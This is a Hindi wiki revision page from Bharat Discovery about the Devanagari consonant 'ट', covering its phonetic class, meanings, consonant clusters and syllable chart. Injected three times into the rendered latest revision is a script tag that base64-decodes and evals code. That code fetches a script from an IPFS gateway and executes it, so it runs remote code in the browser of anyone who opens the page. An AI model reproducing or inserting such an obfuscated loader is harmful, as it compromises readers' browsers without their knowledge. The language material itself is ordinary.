Difference between revisions of "ट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
[[चित्र:ट.jpg|right|150px]]
+
{{सूचना बक्सा संक्षिप्त परिचय
 
+
|चित्र=ट.jpg
'''ट''' [[देवनागरी लिपि]] का तेईसवां [[अक्षर]] है। यह एक [[व्यंजन (व्याकरण)|व्यंजन]] है।
+
|चित्र का नाम=
 +
|विवरण='''ट''' [[देवनागरी वर्णमाला]] में टवर्ग का प्रथम [[व्यंजन (व्याकरण)|व्यंजन]] है।
 +
|शीर्षक 1=भाषाविज्ञान की दृष्टि से
 +
|पाठ 1= यह [[मूर्धन्य व्यंजन|मूर्धन्य]], स्पर्श, अघोष तथा अल्पप्राण व्यंजन है।
 +
|शीर्षक 2= व्याकरण
 +
|पाठ 2=[ [[संस्कृत]] (धातु) टल्‌ + ड ] [[पुल्लिंग]]- धनुष की टंकार, पृथ्वी, शपथ, क़सम, बौना, शब्द, ध्वनि, आवाज़।
 +
|शीर्षक 3=विशेष
 +
|पाठ 3= 'ट्‌' के बाद 'स' और 'ट्‌' से पहले 'क्‌', 'र' और 'स्‌' [[अंग्रेज़ी|अँग्रेज़ी]] आदि से आगत शब्दों में ही जुड़ते हैं। इनमें 'र' का शिरोरेखा के ऊपर रेफ के रूप में रहना ध्यान देने योग्य है। जैसे- थर्ड, बर्ड।
 +
|शीर्षक 4=
 +
|पाठ 4= 
 +
|शीर्षक 5=
 +
|पाठ 5= 
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[ठ]], [[ड]], [[ढ]], [[ण]]
 +
|अन्य जानकारी='ट' वर्ण के बाद आकर गुच्छ बनाने वाले व्यंजनों में प्राय: 'ट्‌', 'ठ्‌', 'य', 'र' और 'स' ही आते हैं और उन्हें सट्‌टा, लट्‌ठा, नाट्‌य, राष्ट्र, नोट्‌स' के समान लिखा जाता है। 'ट्र' (ट्‌+र) विशेष ध्यान देने योग्य है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''ट''' [[देवनागरी वर्णमाला]] में टवर्ग का प्रथम [[व्यंजन (व्याकरण)|व्यंजन]] है। भाषाविज्ञान की दृष्टि से यह [[मूर्धन्य व्यंजन|मूर्धन्य]], स्पर्श, अघोष तथा अल्पप्राण व्यंजन है।
 +
;विशेष-
 +
* 'ट' वर्ण के बाद आकर गुच्छ बनाने वाले व्यंजनों में प्राय: 'ट्‌', 'ठ्‌', 'य', 'र' और 'स' ही आते हैं और उन्हें सट्‌टा, लट्‌ठा, नाट्‌य, राष्ट्र, नोट्‌स' के समान लिखा जाता है। 'ट्र' (ट्‌+र) विशेष ध्यान देने योग्य है।
 +
* 'ट' से पहले आकर गुच्छ बनाने वाले व्यंजनों में प्राय: 'क', 'ट', 'ण', 'र', 'ल', 'ष' और 'स' आते हैं उन्हें 'ऐक्ट, पट्‌ट, चण्ट्‌/चंट, शर्ट, बेल्ट, कष्ट, पोस्ट' के समान लिखा जाता है।
 +
* 'ट्‌' के बाद 'स' और 'ट्‌' से पहले 'क्‌', 'र' और 'स्‌' [[अंग्रेज़ी|अँग्रेज़ी]] आदि से आगत शब्दों में ही जुड़ते हैं। इनमें 'र' का शिरोरेखा के ऊपर रेफ के रूप में रहना ध्यान देने योग्य है। जैसे- थर्ड, बर्ड।
 +
* [ [[संस्कृत]] (धातु) टल्‌ + ड ] [[पुल्लिंग]]- धनुष की टंकार, पृथ्वी, शपथ, क़सम, (किसी वस्तु का) चौथा भाग, चतुर्थांश, नारियल का खोपड़ा, वामन, बौना, शब्द, ध्वनि, आवाज़।<ref>पुस्तक- हिन्दी शब्द कोश खण्ड-1 | पृष्ठ संख्या- 1049</ref>
 +
==ट की बारहखड़ी==
 +
{| class="bharattable-green"
 +
|-
 +
| ट
 +
| टा
 +
| टि
 +
| टी
 +
| टु
 +
| टू
 +
| टे
 +
| टै
 +
| टो
 +
| टौ
 +
| टं
 +
| टः
 +
|}
 
==ट अक्षर वाले शब्द==
 
==ट अक्षर वाले शब्द==
 
* [[टमाटर]]
 
* [[टमाटर]]

Latest revision as of 10:58, 16 December 2016

t
vivaran t devanagari varnamala mean tavarg ka pratham vyanjan hai.
bhashavijnan ki drishti se yah moordhany, sparsh, aghosh tatha alpapran vyanjan hai.
vyakaran [ sanskrit (dhatu) talh‌ + d ] pulliang- dhanush ki tankar, prithvi, shapath, qasam, bauna, shabd, dhvani, avaz.
vishesh 'th‌' ke bad 's' aur 'th‌' se pahale 'kh‌', 'r' aur 'sh‌' aangrezi adi se agat shabdoan mean hi ju date haian. inamean 'r' ka shirorekha ke oopar reph ke roop mean rahana dhyan dene yogy hai. jaise- thard, bard.
sanbandhit lekh th, d, dh, n
any janakari 't' varn ke bad akar guchchh banane vale vyanjanoan mean pray: 'th‌', 'thh‌', 'y', 'r' aur 's' hi ate haian aur unhean sath‌ta, lath‌tha, nath‌y, rashtr, noth‌s' ke saman likha jata hai. 'tr' (th‌+r) vishesh dhyan dene yogy hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

t devanagari varnamala mean tavarg ka pratham vyanjan hai. bhashavijnan ki drishti se yah moordhany, sparsh, aghosh tatha alpapran vyanjan hai.

vishesh-
  • 't' varn ke bad akar guchchh banane vale vyanjanoan mean pray: 'th‌', 'thh‌', 'y', 'r' aur 's' hi ate haian aur unhean sath‌ta, lath‌tha, nath‌y, rashtr, noth‌s' ke saman likha jata hai. 'tr' (th‌+r) vishesh dhyan dene yogy hai.
  • 't' se pahale akar guchchh banane vale vyanjanoan mean pray: 'k', 't', 'n', 'r', 'l', 'sh' aur 's' ate haian unhean 'aikt, path‌t, chanth‌/chant, shart, belt, kasht, post' ke saman likha jata hai.
  • 'th‌' ke bad 's' aur 'th‌' se pahale 'kh‌', 'r' aur 'sh‌' aangrezi adi se agat shabdoan mean hi ju date haian. inamean 'r' ka shirorekha ke oopar reph ke roop mean rahana dhyan dene yogy hai. jaise- thard, bard.
  • [ sanskrit (dhatu) talh‌ + d ] pulliang- dhanush ki tankar, prithvi, shapath, qasam, (kisi vastu ka) chautha bhag, chaturthaansh, nariyal ka khop da, vaman, bauna, shabd, dhvani, avaz.[1]

t ki barahakh di

t ta ti ti tu too te tai to tau tan tah

t akshar vale shabd



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pustak- hindi shabd kosh khand-1 | prishth sankhya- 1049

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>